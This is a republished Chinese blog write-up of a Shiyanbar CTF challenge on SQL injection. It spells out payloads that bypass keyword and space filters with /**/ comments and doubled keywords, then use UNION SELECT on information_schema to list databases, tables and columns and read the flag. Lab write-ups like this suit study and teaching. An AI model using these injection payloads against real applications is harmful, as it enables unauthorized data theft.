经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
实验吧简单的SQL注入1,简单的SQL注入
来源:cnblogs  作者:波哥在努力  时间:2019/5/8 9:22:26  对本文有异议

接上面一篇博客。

实验吧简单的sql注入1

题目连接   http://ctf5.shiyanbar.com/423/web/

 

同样,直接输入 1加个但引号,结果下面有返回错误,              ,         有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。

输入  1' and 1=1#  按理说应该是返回正常,结果返回了一个错误 

‘#‘  被过滤了,那好 还有其他姿势,输入   1’ and '1'='1

结果也错,怎么回事? 换or试一试  用 1’ or '1'='1

出现所有数据,但是and不行,所以估计是and被过滤了  看看是不是被过滤了 双写一下  1' andand '1'='1

输入两个and 结果只出现一个and ,确定and是被过滤了,而且后面那个空格也过滤了

没事,这里想到用/**/绕过过滤,用union

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

 

 说老实话我不知道为什么这里的database()用不起,大神指点一下.

 接下来爆表明

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

得到表名 flag

 

接下来爆字段名

1'/**/union/**/select/**/column_name/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name='flag

但是不行 被报错 

 

 把information_schema.coluinformation_schema.columnsmns 给我过滤了,这里用双写,但是双写发现也会被过滤,可以啊,那我把一部分写在中间  

1'/**/union/**/select/**/column_name/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name='flag

结果还是报错,可能是起那面column_name也过滤了 ,这里把column_name也双写

1'/**/union/**/select/**/column_nacolumn_nameme/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name='flag

这里出现字段名flag。

接下来直接 1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

 

拿到flag 

 

第二道题 用前两句一样可以拿到库名和表明,只是第三句爆字段名的时候不用双写

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag

 

也可以拿到表明和字段名  也是flag 和flag

 

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

 

也可以拿到答案

 关于简单的sql注入3,我暂时还不会,fuzz测试还没学会,过两天会更新,一定会学会

 

原文链接:http://www.cnblogs.com/tlbjiayou/p/10828601.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号